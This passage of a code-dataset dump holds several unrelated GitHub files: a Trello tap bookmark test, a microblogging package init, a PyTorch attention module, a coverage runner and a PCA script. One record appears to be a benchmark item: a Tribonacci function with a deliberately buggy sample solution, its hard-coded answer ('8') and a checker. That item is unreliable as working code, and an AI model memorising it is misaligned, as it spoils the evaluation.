obj_id_list = [obj.get('id') for obj in objs]\n\n id_created_dict = {obj_id: dt.fromtimestamp(int(obj_id[0:8],16))\n for obj_id in obj_id_list}\n\n return sorted(id_created_dict.items())\n\n def untestable_streams(self):\n return {\n 'users',\n 'boards'\n }\n\n def expected_check_streams(self):\n return {\n 'actions',\n 'boards',\n 'cards',\n 'checklists',\n 'lists',\n 'users'\n }\n\n def expected_sync_streams(self):\n return self.expected_check_streams()\n\n def expected_full_table_sync_streams(self):\n return {\n 'boards',\n 'cards',\n 'checklists',\n 'lists',\n 'users',\n }\n\n def expected_incremental_sync_streams(self):\n return {\n 'actions'\n }\n\n def tap_name(self):\n return \"tap-trello\"\n\n def expected_pks(self):\n return {\n 'boards' : {'id'},\n 'users' : {'id', 'boardId'},\n 'lists' : {'id'},\n 'actions' : {'id'},\n 'cards' : {'id'},\n 'checklists': {'id'}\n }\n\n def expected_automatic_fields(self):\n return {\n 'boards' : {'id'},\n 'users' : {'id', 'boardId'},\n 'lists' : {'id'},\n 'actions' : {'id', 'date'},\n 'cards' : {'id'},\n 'checklists': {'id'}\n }\n\n def get_properties(self):\n return {\n 'start_date' : dt.strftime(dt.utcnow() - timedelta(days=2), self.START_DATE_FORMAT), # set to utc today\n }\n\n def get_states_formatted(self, index: int):\n state_index = \"state_{}\".format(index)\n states = { \"bookmarks\": { \"actions\": self.ACTIONS_STATES[state_index]}}\n for stream in self.expected_incremental_sync_streams().difference({'boards'}):\n states['bookmarks'][stream] = dict()\n return states\n\n def test_run(self):\n print(\"\\n\\nRUNNING {}\\n\\n\".format(self.name()))\n\n # Initialize start date prior to first sync\n self.START_DATE = self.get_properties().get('start_date')\n\n # ensure data exists for sync streams and set expectations\n records_to_create = 3\n expected_records = {x: [] for x in self.expected_sync_streams()} # ids by stream\n for stream in self.expected_sync_streams().difference(self.untestable_streams()):\n if stream in self.expected_incremental_sync_streams():\n since = dt.strptime(self.START_DATE, self.START_DATE_FORMAT).strftime(self.TEST_TIME_FORMAT)\n _, existing_objects = utils.get_total_record_count_and_objects(stream, since=since)\n else:\n _, existing_objects = utils.get_total_record_count_and_objects(stream)\n\n if existing_objects:\n logging.info(\"Data exists for stream: {}\".format(stream))\n for obj in existing_objects: # add existing records to expectations\n expected_records[stream].append(\n {field: obj.get(field)\n for field in self.expected_automatic_fields().get(stream)}\n )\n else:\n logging.info(\"Data does not exist for stream: {}\".format(stream))\n while len(expected_records.get(stream)) < records_to_create:\n # Create more records if necessary\n new_object = utils.create_object(stream)\n logging.info(\"Data generated for stream: {}\".format(stream))\n expected_records[stream].append({field: new_object.get(field)\n for field in self.expected_automatic_fields().get(stream)})\n\n # run in check mode\n conn_id = connections.ensure_connection(self)\n check_job_name = runner.run_check_mode(self, conn_id)\n\n #verify check exit codes\n exit_status = menagerie.get_exit_status(conn_id, check_job_name)\n menagerie.verify_check_exit_status(self, exit_status, check_job_name)\n\n found_catalogs = menagerie.get_catalogs(conn_id)\n self.assertGreater(len(found_catalogs), 0, msg=\"unable to locate schemas for connection {}\".format(conn_id))\n\n found_catalog_names = set(map(lambda c: c['tap_stream_id'], found_catalogs))\n\n diff = self.expected_check_streams().symmetric_difference( found_catalog_names )\n self.assertEqual(len(diff), 0, msg=\"discovered schemas do not match: {}\".format(diff))\n print(\"discovered schemas are OK\")\n\n #select all catalogs\n for c in found_catalogs:\n catalog_entry = menagerie.get_annotated_schema(conn_id, c['stream_id'])\n\n for k in self.expected_automatic_fields()[c['stream_name']]:\n mdata = next((m for m in catalog_entry['metadata']\n if len(m['breadcrumb']) == 2 and m['breadcrumb'][1] == k), None)\n print(\"Validating inclusion on {}: {}\".format(c['stream_name'], mdata))\n self.assertTrue(mdata and mdata['metadata']['inclusion'] == 'automatic')\n\n connections.select_catalog_and_fields_via_metadata(conn_id, c, catalog_entry)\n \n #clear state\n menagerie.set_state(conn_id, {})\n\n # Run sync\n sync_job_name = runner.run_sync_mode(self, conn_id)\n\n #verify tap and target exit codes\n exit_status = menagerie.get_exit_status(conn_id, sync_job_name)\n menagerie.verify_sync_exit_status(self, exit_status, sync_job_name)\n\n # verify data was replicated\n record_count_by_stream = runner.examine_target_output_file(\n self, conn_id, self.expected_sync_streams(), self.expected_pks())\n replicated_row_count = reduce(lambda accum,c : accum + c, record_count_by_stream.values())\n self.assertGreater(replicated_row_count, 0,\n msg=\"failed to replicate any data: {}\".format(record_count_by_stream))\n print(\"total replicated row count: {}\".format(replicated_row_count))\n synced_records = runner.get_records_from_target_output()\n\n # Verify bookmarks were saved for all streams\n state = menagerie.get_state(conn_id)\n for stream in self.expected_incremental_sync_streams():\n self.assertTrue(state.get('bookmarks', {}).get(stream, {}).get('window_start', {}))\n print(\"Bookmarks meet expectations\")\n\n # Grab the empty formatted states to test\n states_to_test = [self.get_states_formatted(i) for i in range(len(self.ACTIONS_STATES))]\n\n ##########################################################################\n ### Testing standard sync state_0\n ##########################################################################\n version_0 = menagerie.get_state_version(conn_id)\n\n # Set window_start to start_date \n window_start_0 = dt.strptime(self.START_DATE, self.START_DATE_FORMAT)\n states_to_test[0]['bookmarks']['actions']['window_start'] = window_start_0.strftime(self.TEST_TIME_FORMAT)\n\n print(\"Interjecting test state:\\n{}\".format(states_to_test[0]))\n menagerie.set_state(conn_id, states_to_test[0], version_0)\n\n # Run another sync\n print(\"Running sync job 0\")\n sync_job_name_0 = runner.run_sync_mode(self, conn_id)\n\n #verify tap and target exit codes\n exit_status_0 = menagerie.get_exit_status(conn_id, sync_job_name_0)\n menagerie.verify_sync_exit_status(self, exit_status_0, sync_job_name_0)\n\n # verify data was replicated\n record_count_by_stream_0 = runner.examine_target_output_file(\n self, conn_id, self.expected_sync_streams(), self.expected_pks()\n )\n replicated_row_count_0 = reduce(lambda accum,c : accum + c, record_count_by_stream_0.values())\n self.assertGreater(replicated_row_count_0, 0,\n msg=\"failed to replicate any data: {}\".format(record_count_by_stream_0))\n print(\"total replicated row count: {}\".format(replicated_row_count_0))\n synced_records_0 = runner.get_records_from_target_output()\n\n # Test state_0\n print(\"Testing State 0\")\n state_0 = menagerie.get_state(conn_id)\n for stream in self.expected_incremental_sync_streams():\n # Verify bookmarks were saved as expected inc streams\n self.assertTrue(state_0.get('bookmarks', {}).get(stream, {}).get('window_start', {}))\n print(\"Bookmarks meet expectations\")\n for stream in self.expected_sync_streams().difference(self.untestable_streams()):\n data = synced_records.get(stream)\n record_messages = [set(row['data']) for row in data['messages']]\n\n data_0 = synced_records_0.get(stream)\n record_messages_0 = [set(row['data']) for row in data_0['messages']]\n\n # Verify we got the same number of records as the first sync\n self.assertEqual(record_count_by_stream_0.get(stream), record_count_by_stream.get(stream),\n msg=\"Syncs should replicate the samee number of records\")\n self.assertEqual(record_messages_0, record_messages,\n msg=\"Syncs should replicate the samee number of records\")\n\n # Verify we got the exact same records as the first sync\n for record_message in record_messages:\n self.assertTrue(record_message in record_messages_0,\n msg=\"Expected {} to be in this sync.\".format(record_message))\n\n ##########################################################################\n ### Testing interrupted sync state_1 with date-windowing\n ##########################################################################\n version_1 = menagerie.get_state_version(conn_id)\n\n # Set parent_id to id of second-to-last baord the tap will replicate\n sorted_parent_objs = self.get_tap_sorted_stream()\n penultimate_created_parent_id, _ = sorted_parent_objs[-2]\n last_created_parent_id, _ = sorted_parent_objs[-1]\n states_to_test[1]['bookmarks']['actions']['parent_id'] = penultimate_created_parent_id\n\n # Set window_end based off current time\n window_end_1 = dt.utcnow().strftime(self.TEST_TIME_FORMAT)\n # window_end_1 = state['bookmarks']['actions']['window_start']\n states_to_test[1]['bookmarks']['actions']['window_end'] = window_end_1\n\n # Set sub_window_end to today\n sub_window_end_1 = dt.strptime(self.START_DATE, self.START_DATE_FORMAT) + timedelta(days=2)\n states_to_test[1]['bookmarks']['actions']['sub_window_end'] = sub_window_end_1.strftime(self.TEST_TIME_FORMAT)\n\n # Set window_start to start_date\n window_start_1 = dt.strptime(self.START_DATE, self.START_DATE_FORMAT)\n states_to_test[1]['bookmarks']['actions']['window_start'] = window_start_1.strftime(self.TEST_TIME_FORMAT)\n\n print(\"Interjecting test state:\\n{}\".format(states_to_test[1]))\n menagerie.set_state(conn_id, states_to_test[1], version_1)\n\n # Run another sync (state_1)\n print(\"Running sync job 1\")\n sync_job_name_1 = runner.run_sync_mode(self, conn_id)\n\n #verify tap and target exit codes\n exit_status_1 = menagerie.get_exit_status(conn_id, sync_job_name_1)\n menagerie.verify_sync_exit_status(self, exit_status_1, sync_job_name_1)\n\n # verify data was replicated\n record_count_by_stream_1 = runner.examine_target_output_file(\n self, conn_id, self.expected_sync_streams(), self.expected_pks()\n )\n replicated_row_count_1 = reduce(lambda accum,c : accum + c, record_count_by_stream_1.values())\n self.assertGreater(replicated_row_count_1, 0,\n msg=\"failed to replicate any data: {}\".format(record_count_by_stream_1))\n print(\"total replicated row count: {}\".format(replicated_row_count_1))\n\n synced_records_1 = runner.get_records_from_target_output()\n \n # Test state_1\n print(\"Testing State 1\")\n state_1 = menagerie.get_state(conn_id)\n for stream in self.expected_incremental_sync_streams():\n # Verify bookmarks were saved as expected inc streams\n self.assertTrue(state_1.get('bookmarks', {}).get(stream, {}).get('window_start', {}))\n print(\"Bookmarks for {} meet expectations\".format(stream))\n\n # Verify the original sync catches more data since current test state bookmarks on the second most recent board\n self.assertGreater(record_count_by_stream.get(stream, 0),\n record_count_by_stream_1.get(stream, 0),\n msg=\"Expected to have more records for {}\".format(stream)\n )\n\n # Verify sync 1 only replicates data from the bookmarked parent object (the most recently creted board)\n records_last_board = utils.get_objects(stream, parent_id=last_created_parent_id, since=window_start_1)\n record_count_last_board = len(records_last_board)\n\n records_penult_window_start = utils.get_objects(stream, parent_id=penultimate_created_parent_id, since=window_start_1)\n record_count_penult_window_start = len(records_penult_window_start)\n\n records_penult_sub_window = utils.get_objects(stream, parent_id=penultimate_created_parent_id, since=sub_window_end_1)\n record_count_penult_sub_window = len(records_penult_sub_window)\n\n record_count_penult_board = record_count_penult_window_start - record_count_penult_sub_window\n for record in records_penult_sub_window: # records_penult_window_start - records_penult_sub_window\n for rec in records_penult_window_start:\n if record.get('id') == rec.get('id'):\n records_penult_window_start.remove(rec)\n break\n\n assert record_count_penult_board == len(records_penult_window_start)\n expected_record_count_1 = record_count_penult_board + record_count_last_board\n # expected_records_1 = records_last_board + records_penult_window_start SEE FOR LOOPS\n\n synced_actions = synced_records_1.get(stream)\n actual_data = [row.get('data').get('id') for row in synced_actions['messages']]\n\n for record in records_last_board:\n if record.get('id') in actual_data:\n continue\n print(\"MISSING RECORD {}\".format(record))\n\n for record in records_penult_window_start:\n if record.get('id') in actual_data:\n continue\n print(\"MISSING RECORD {}\".format(record))\n\n self.assertEqual(expected_record_count_1, record_count_by_stream_1.get(stream, 0),\n msg=\"Sync 1 should only replicate data from the most recently creted board.\")\n\n ##########################################################################\n ### Testing interrupted sync state_2 without date-windowing\n ##########################################################################\n version_2 = menagerie.get_state_version(conn_id)\n\n # Set parent_id to id of last baord the tap will replicate\n # Set window_end based off current time\n window_end_2 = dt.utcnow().strftime(self.TEST_TIME_FORMAT)\n # Set window_start to today at midnight\n window_start_2 = dt.strptime(self.START_DATE, self.START_DATE_FORMAT) + timedelta(days=2)\n states_to_test[2]['bookmarks']['actions'] = {}\n for stream in self.expected_full_table_sync_streams().difference({'boards'}):\n states_to_test[2]['bookmarks'][stream] = {'window_start': window_start_2.strftime(self.TEST_TIME_FORMAT),\n 'window_end': window_end_2,\n 'parent_id': last_created_parent_id}\n\n print(\"Interjecting test state:\\n{}\".format(states_to_test[2]))\n menagerie.set_state(conn_id, states_to_test[2], version_2)\n\n # Run another sync\n print(\"Running sync job 2\")\n sync_job_name_2 = runner.run_sync_mode(self, conn_id)\n\n #verify tap and target exit codes\n exit_status_2 = menagerie.get_exit_status(conn_id, sync_job_name_2)\n menagerie.verify_sync_exit_status(self, exit_status_2, sync_job_name_2)\n\n # verify data was replicated\n record_count_by_stream_2 = runner.examine_target_output_file(\n self, conn_id, self.expected_sync_streams(), self.expected_pks()\n )\n replicated_row_count_2 = reduce(lambda accum,c : accum + c, record_count_by_stream_2.values())\n self.assertGreater(replicated_row_count_2, 0,\n msg=\"failed to replicate any data: {}\".format(record_count_by_stream_2))\n print(\"total replicated row count: {}\".format(replicated_row_count_2))\n synced_records_2 = runner.get_records_from_target_output()\n\n # Test state_2\n print(\"Testing State 2\")\n state_2 = menagerie.get_state(conn_id)\n for stream in self.expected_full_table_sync_streams().difference(self.untestable_streams()):\n # Verify bookmarks were saved as expected inc streams\n self.assertTrue(state_2.get('bookmarks', {}).get(stream, {}).get('window_start', {}),\n msg=\"{} should have a bookmark value\".format(stream))\n print(\"Bookmarks meet expectations\")\n\n # Verify the smaller window replicates less data \n self.assertLessEqual(record_count_by_stream_2.get(stream, 0),\n record_count_by_stream.get(stream, 0),\n msg=\"Expected to have more records for {}\".format(stream)\n )\n\n # Verify the actions from today are caught in this sync\n expected_record_count_2 = len(utils.get_objects(stream, parent_id=last_created_parent_id))\n self.assertEqual(expected_record_count_2, record_count_by_stream_2.get(stream, 0),\n msg=\"Should have less than or equal number of records based on whether we lookback.\")\n\n ##########################################################################\n ### CLEAN UP\n ##########################################################################\n stream_to_delete = 'boards'\n boards_remaining = 5\n print(\"Deleting all but {} records for stream {}.\".format(boards_remaining, stream_to_delete))\n board_count = len(expected_records.get(stream_to_delete, []))\n for obj_to_delete in expected_records.get(stream_to_delete, []): # Delete all baords between syncs\n if board_count > boards_remaining:\n utils.delete_object(stream_to_delete, obj_to_delete.get('id'))\n board_count -= 1\n else:\n break\n\n # Reset the parent objects that we have been tracking\n utils.reset_tracked_parent_objects()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"singer-io/tap-trello","sub_path":"tests/test_trello_bookmark_states.py","file_name":"test_trello_bookmark_states.py","file_ext":"py","file_size_in_byte":21629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17865720046","text":"from .authentication import authentication_controller, logout_controller\nfrom .index import index_controller\nfrom .notification import get_user_notifications_controller\nfrom .profile import (\n adding_a_follower_profile_controller,\n edit_field_profile_controller,\n follower_profile_removal_controller,\n get_followers_profile_controller,\n my_profile_controller,\n profile_edit_controller,\n profile_users_controller,\n receiving_profile_followings_controller,\n)\nfrom .registration import (\n registration_confirmations_controller,\n registrations_controller,\n)\nfrom .search_twit_by_tag import get_twits_by_tag_controller\nfrom .trending_in_your_country import trending_in_your_country_controller\nfrom .twits import (\n add_a_twits_controller,\n create_answer_to_twit_controller,\n edit_twit_controller,\n twit_deletion_controller,\n view_twits_controller,\n)\nfrom .twits_likes import add_like_the_twit_controller, deleting_a_twit_likes_controller\nfrom .twits_repost import (\n adding_a_tweet_repost_controller,\n twit_repost_deletion_controller,\n)\n\n__all__ = [\n \"index_controller\",\n \"registrations_controller\",\n \"authentication_controller\",\n \"logout_controller\",\n \"profile_controller\",\n \"profile_users_controller\",\n \"receiving_profile_followings_controller\",\n \"get_followers_profile_controller\",\n \"profile_edit_controller\",\n \"edit_field_profile_controller\",\n \"adding_a_follower_profile_controller\",\n \"add_a_twits_controller\",\n \"view_twits_controller\",\n \"twit_deletion_controller\",\n \"add_like_the_twit_controller\",\n \"adding_a_tweet_repost_controller\",\n \"create_answer_to_twit_controller\",\n \"edit_twit_controller\",\n \"registration_confirmations_controller\",\n \"deleting_a_twit_likes_controller\",\n \"twit_repost_deletion_controller\",\n \"follower_profile_removal_controller\",\n \"my_profile_controller\",\n \"get_twits_by_tag_controller\",\n \"trending_in_your_country_controller\",\n \"get_user_notifications_controller\",\n]\n","repo_name":"EugeniRosh/microblogging","sub_path":"src/microblogging/core/presentation/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39189610907","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport math\nimport random\n\nfrom dataset import START, PAD\n\nclass TUBEPosBias(nn.Module):\n def __init__(self, q_channels, k_channels, head_num=8, dropout=0.1):\n super(TUBEPosBias, self).__init__()\n\n self.q_channels = q_channels\n self.k_channels = k_channels\n self.head_dim = q_channels // head_num\n self.head_num = head_num\n\n self.q_linear = nn.Linear(q_channels, self.head_num * self.head_dim)\n self.k_linear = nn.Linear(k_channels, self.head_num * self.head_dim)\n\n self.temperature = 2 * (self.head_num * self.head_dim) ** 0.5\n\n def forward(self, q, k):\n # q [B, Q_LEN, Q_DIM]\n # k [B, K_LEN, K_DIM]\n # attn_bias [B, HEAD_NUM, Q_LEN, K_LEN]\n b, q_len, k_len = q.size(0), q.size(1), k.size(1)\n q = (\n self.q_linear(q)\n .reshape(b, q_len, self.head_num, self.head_dim)\n .transpose(1, 2)\n ) # [B, HEAD_NUM, Q_LEN, HEAD_DIM]\n k = (\n self.k_linear(k)\n .reshape(b, k_len, self.head_num, self.head_dim)\n .transpose(1, 2)\n )\n\n\n attn = torch.matmul(q, k.transpose(2, 3)) / self.temperature\n\n return attn # [B, HEAD_NUM, Q_LEN, K_LEN]\n\n","repo_name":"bcaitech1/p4-fr-p4_ocr_aljalddakggalssen","sub_path":"gj/code/networks/TUBE.py","file_name":"TUBE.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74691690435","text":"from __future__ import print_function\nimport xml.etree.ElementTree as ET\nfrom check import *\nfrom csvoutput import *\nfrom run import *\nfrom regression import *\nimport variables as v\n\n\ndef getXmlProperties(root, args):\n \"\"\" Get option flags values from the xml input file.\n\n Arguments:\n root (namespace): tree representation of the xml file.\n args (namespace): option flags values.\n \"\"\"\n\n properties = []\n\n for prop in root.iter('property'):\n if prop.get('value') == 'True':\n value = True\n elif prop.get('value') == 'False':\n value = False\n else:\n if (prop.get('name') == 'exclude-modules' or\n prop.get('name') == 'cover-filter'):\n value = prop.get('value').split()\n else:\n value = prop.get('value')\n\n setattr(args, prop.get('name').replace('-', '_'), value)\n\n\ndef getTestSuitesFromXml(root, args):\n \"\"\" Get test suites and their flags from the xml input file.\n\n Arguments:\n root (namespace): tree representation of the xml file.\n args (namespace): option flags values.\n\n Returns:\n test_suites (str list): paths to the test suites.\n flags (str list): flags of each test suite.\n env_variables (str list): environment variables to set before\n executing the test.\n \"\"\"\n\n test_suites = []\n flags = []\n test_suite_flag = []\n env_variables = []\n names = []\n\n for test_suite in root.iter('testsuite'):\n test_suites.append(test_suite.get('path'))\n flags.append([test_suite.get('flags')])\n names.append(test_suite.get('name'))\n env_dict = {}\n for env in test_suite.get('env_variables').split(';'):\n split_pos = env.find('=')\n key = env[:split_pos]\n if key:\n env_dict[key] = env[split_pos + 1:]\n env_variables.append(env_dict)\n\n for i, test_suite in enumerate(test_suites):\n test_suite_flag.append([test_suite, \" \".join(flags[i])])\n\n setattr(args, 'test_suites', test_suite_flag)\n\n return test_suites, flags, env_variables, names\n\n\ndef getModulesFromXml(root, args):\n \"\"\" Get modules' sources and objects directories from the xml input file.\n\n Arguments:\n root (namespace): tree representation of the xml file.\n args (namespace): option flags values.\n\n Returns:\n modules (str list list): list of pairs [sources, objects] of the\n modules to cover.\n \"\"\"\n\n modules = []\n\n for module in root.iter('module'):\n modules.append([module.get('sources'), module.get('objects')])\n\n setattr(args, 'modules', modules)\n\n return modules\n\n\ndef runFromXml(arg_parser, args):\n \"\"\" Launch coverage tests from an xml input file.\n\n Arguments:\n arg_parser (namespace): arguments parser of this script.\n args (namespace): option flags values.\n \"\"\"\n\n root = ET.parse(args.xml_input).getroot()\n properties = getXmlProperties(root, args)\n test_suites, flags, env_variables, names = getTestSuitesFromXml(root, args)\n modules = getModulesFromXml(root, args)\n\n checkIfModulesExists(args, modules)\n\n if args.csv_output != '':\n csvWriteProperties(args)\n csvWriteModulesHeaders(modules)\n\n for i, test_suite in enumerate(test_suites):\n runCoverageTestSuite(arg_parser, args, test_suite, flags[i],\n env_variables[i], modules, names[i])\n\n if args.run_lcov:\n results = CoverageResults()\n lcov_file = lcovMergeTestSuitesInfoFiles(args)\n\n if lcov_file is not None:\n lcovParseInfoFile(args, lcov_file, results, True)\n\n if not args.quiet:\n pOut('\\n' + v.SHARPS_TAG + 'Coverage of all test suites summary\\n')\n displayCoverageResults(args, ['all test suites'], results)\n\n if args.csv_output != '':\n csvWriteFile(results, args.csv_output)\n\n if args.junit_xml_output != '':\n jUnitMergeTestSuites(args.junit_xml_output)\n\n if args.check_regression:\n checkRegression(args, results)\n","repo_name":"codeplaysoftware/oneapi-construction-kit","sub_path":"scripts/coverage/modules/xmlinput.py","file_name":"xmlinput.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"61"} +{"seq_id":"23860912288","text":"'''num = int(input())\nif num != 0:\n if num > 0:\n print(\"Number is greater than Zero\")\n else:\n print(\"Number is less than Zero\")'''\nimport math\n\n\ndef is_prime(num):\n if num == 1:\n return 0\n for i in range(2, int(math.sqrt(num))+1):\n if num % i == 0:\n return i\n return 1\n\n\na = int(input())\nb = int(input())\nz = math.gcd(a, b)\nres = is_prime(z)\nif res == 1:\n print(1)\nelif not res: \n print(\"Second Greatest GCD Doesn't Exist\")\nelse:\n print(z // res)","repo_name":"35C4n0r/Codeforces-Py-","sub_path":"PycharmProjects/College/main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32532686742","text":"def tri(n):\n \"\"\"Everyone knows Fibonacci sequence, it was studied deeply by mathematicians in \n the last couple centuries. However, what people don't know is Tribonacci sequence.\n Tribonacci sequence is defined by the recurrence:\n tri(1) = 3\n tri(n) = 1 + n / 2, if n is even.\n tri(n) = tri(n - 1) + tri(n - 2) + tri(n + 1), if n is odd.\n For example:\n tri(2) = 1 + (2 / 2) = 2\n tri(4) = 3\n tri(3) = tri(2) + tri(1) + tri(4)\n = 2 + 3 + 3 = 8 \n You are given a non-negative integer number n, you have to a return a list of the \n first n + 1 numbers of the Tribonacci sequence.\n Examples:\n tri(3) = [1, 3, 2, 8]\n \n Example solution:\n # line 1\n if n == 0:\n # line 2\n return [1]\n # line 3\n my_tri = [1, 3]\n # line 4\n for i in range(2, n + 1):\n # line 5\n if i % 2 == 0:\n # line 6\n my_tri.append(i / 2 + 1)\n # line 7\n else:\n # line 8\n my_tri.append(my_tri[i - 1] + my_tri[i - 2] + (n + 2) / 2)\n # line 9\n return my_tri\n \n \"\"\"\n # Please print out which line of the above program contains an error. E.g. if the bug is on line 4 then print 4\n # END OF CONTEXT\n print(\"8\")\n # END OF SOLUTION\n\ndef check(candidate):\n\n import io\n from contextlib import redirect_stdout\n\n f = io.StringIO()\n with redirect_stdout(f):\n candidate(10)\n out = f.getvalue().strip('\\n')\n\n assert \"8\" == out\n for i in range(0, 10):\n if i != 8:\n assert str(i) != out\n\nif __name__ == '__main__':\n check(tri)\n","repo_name":"openai/code-align-evals-data","sub_path":"alignment/find_bug/tri.py","file_name":"tri.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"61"} +{"seq_id":"11383661885","text":"from __future__ import print_function, division, absolute_import\n\n__author__ = 'Moshe Shilemay'\n__license__ = 'MIT'\n__email__ = \"moshes777@gmail.com\"\n'''\n Last modified: 27.01.209\n Python Version: 3.6\n'''\n\nimport numpy as np\nimport os\nfrom sklearn.decomposition import PCA, IncrementalPCA\nfrom sklearn import model_selection\nfrom sklearn import preprocessing\nimport pickle\nfrom data_generation.DataGeneration import DataGeneration\n\n# ------------ parameters ------------\n# featuresFile = r'../Results/script_featuresExtraction/features_3_examples.p'\nfeaturesFileList = [\n r'../Results/script_featuresExtraction/features_All_examples_without_new_whale.p',\n # r'../Results/script_featuresExtraction/features_new_whale_examples.p'\n ]\nresultsDir = '../Results/script_calcSavePCA'\nsfx = '_without_new_whale'\n# sfx = '_new_whale_examples'#\nNMaxIds = None #10 # maximum number of ids to load, if None - all ids will be used\nNComponentsPCA = 4096 # number of pca compnents, should be equal or greater than NMaxIds\ntestSize = 0.2 # test set percentage\nipcaFlag = True # if True, incremental pca is used, otherwise regular pca is used\nipcaBatchSize = NComponentsPCA #10 # number of features in each ipca iteration, should be equal or grater than NComponentsPCA\n\nos.makedirs(resultsDir, exist_ok=True) # create results dir if not exist\n\n# ------------ load features ------------\n\ncounter = 0\nfeatsList = []\nidsList = []\n\nfor featuresFile in featuresFileList: # iterate over all features files\n\n with open(featuresFile, 'rb') as fid:\n try:\n while True:\n id, feats = pickle.load(fid)\n idsList.extend(np.repeat(id, len(feats)))\n featsList.extend(feats)\n counter += 1\n print('reading features {}'.format(counter))\n if (NMaxIds is not None) and (counter >= NMaxIds):\n break\n except EOFError:\n pass\n\n# convert lists to ndarrays\nprint('converting lists to ndarrays ...')\nfeats = np.asarray(featsList)\nids = np.asarray(idsList)\nprint('done')\n\n# ------------ Pre-Processing ------------\n\n# normalize each feature to have zero mean and unit variance\nprint('whitening features ...')\n# feats = (feats - feats.mean(axis=1)[:,np.newaxis]) / feats.std(axis=1)[:,np.newaxis]\nscaler = preprocessing.StandardScaler(copy=False, with_mean=True, with_std=True)\nfeats = scaler.fit_transform(feats)\nprint('done')\n\n# ------------ Split to Train and Validation Sets ------------\n\nprint('spliting data to train and val ...')\ntrainInd, valInd = DataGeneration.stratifiedSplit(y=ids, test_size=testSize, random_state=42)\nprint('done')\n\n# ------------ PCA ------------\n\n# verify that number of principal components is not greater than number of examples\n# verify that the following holds: (see: https://github.com/scikit-learn/scikit-learn/issues/6452)\n# n_samples > n_components > batch_size\nif len(trainInd) < NComponentsPCA:\n NComponentsPCA = len(trainInd)\n\nif ipcaBatchSize < NComponentsPCA:\n NComponentsPCA = ipcaBatchSize\n\n# get NComponentsPCA principle components using PCA - using train data only\nprint('fitting pca to training data...')\nif ipcaFlag:\n # incremental PCA - calculate PCA incrementaly in bathces\n pca = IncrementalPCA(n_components=NComponentsPCA, batch_size=ipcaBatchSize)\n pca.fit(feats[trainInd])\nelse:\n # regular PCA - loads all data into memory\n pca = PCA(n_components=NComponentsPCA)\n pca.fit(feats[trainInd])\nprint('done')\n\nprint('{} componenets PCA - explained variance = {}'.format(NComponentsPCA, pca.explained_variance_ratio_[0]))\n\n# transform\nprint('transforming train and val data according to pca...')\ntrainPCA = pca.transform(feats[trainInd])\nvalPCA = pca.transform(feats[valInd])\nprint('done')\n\n# save pca\nprint('saving pca data ...')\n# fileName = os.path.join(resultsDir, 'pca_{}_trainExamples_{}_components{}.p'.format(trainPCA.shape[0], trainPCA.shape[-1], sfx))\n# with open(fileName, 'wb') as fid:\n# pickle.dump([pca, trainPCA, valPCA, trainInd, valInd], fid)\n\n# save pca instance\nfileName = os.path.join(resultsDir, 'pca_{}_trainExamples_{}_components{}_instance.p'.format(trainPCA.shape[0], trainPCA.shape[-1], sfx))\nwith open(fileName, 'wb') as fid:\n pickle.dump([pca], fid)\n\n# save transformed features in batches\nfileName = os.path.join(resultsDir, 'pca_{}_trainExamples_{}_components{}_features.p'.format(trainPCA.shape[0], trainPCA.shape[-1], sfx))\nwith open(fileName, 'wb') as fid:\n pickle.dump([trainPCA, valPCA, trainInd, valInd], fid)\n\n# # save transformed train features in batches\n# fileName = 'pca_{}_trainExamples_{}_components{}_featuresTrain.p'.format(trainPCA.shape[0], trainPCA.shape[-1], sfx)\n# fid = open(os.path.join(resultsDir, fileName), 'wb')\n#\n# batch_size = 100\n# n_examples = trainPCA.shape[0]\n# n_batches = int(n_examples / batch_size)\n# n_residual = n_examples - batch_size * n_batches\n#\n# for n in np.arange(n_batches):\n# ind = np.arange(n*batch_size, (n+1)*batch_size)\n# pickle.dump([trainPCA[ind, ...], trainInd[ind, ...]], fid)\n#\n# if n_residual > 0:\n# ind = np.arange(batch_size * n_batches, n_examples)\n# pickle.dump([trainPCA[ind, ...], trainInd[ind, ...]], fid)\n#\n# fid.close()\n\nprint('done')\n\nprint('Done!')\n","repo_name":"moshes7/humpback-whale","sub_path":"scripts/script_calcSavePCA.py","file_name":"script_calcSavePCA.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25498815623","text":"#!/usr/bin/env python3\n\ncard_public = 1327981\ndoor_public = 2822615\ngen = 7\nmod = 20201227\n\n# It's Christmas Day and I'm in a rush, so let's just brute-force this...\n\ndef rev(public):\n i = 1\n while True:\n if pow(gen, i, mod) == public:\n return i\n i += 1\n\ndoor_secret = rev(door_public)\n\nprint(f\"Part one: {pow(card_public, door_secret, mod)}\")\n","repo_name":"sde1000/aoc2020","sub_path":"day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24420211706","text":"# I don't think I need this for this project any more, but it might be worth packaging up on its own\n\nclass _SourceOfTruth(object):\n '''\n Sources of Truth are singletons that map specified keys to globally singular values\n that are immutable, once set (using public interfaces)\n Sources of Truth follow rules regarding how key/values setting may happen, specifically:\n 1. Only keys that are expected may be set (i.e., they must be present in the object definition)\n 2. Values are updated *only* the first time any attempt is made to set it\n 3. Thereafter, any attempt to set that attribute to the same value is ignored\n 4. Any attempt to set that attribute to a *new* value is treated as evidence of significant design problems\n '''\n managed_names = dict()\n\n def __init__(self):\n raise RuntimeError(f'Attempt to initialize SourceOfTruth subclass {self.__class__.__name__}. Please don\\'t '\n f'create multiple 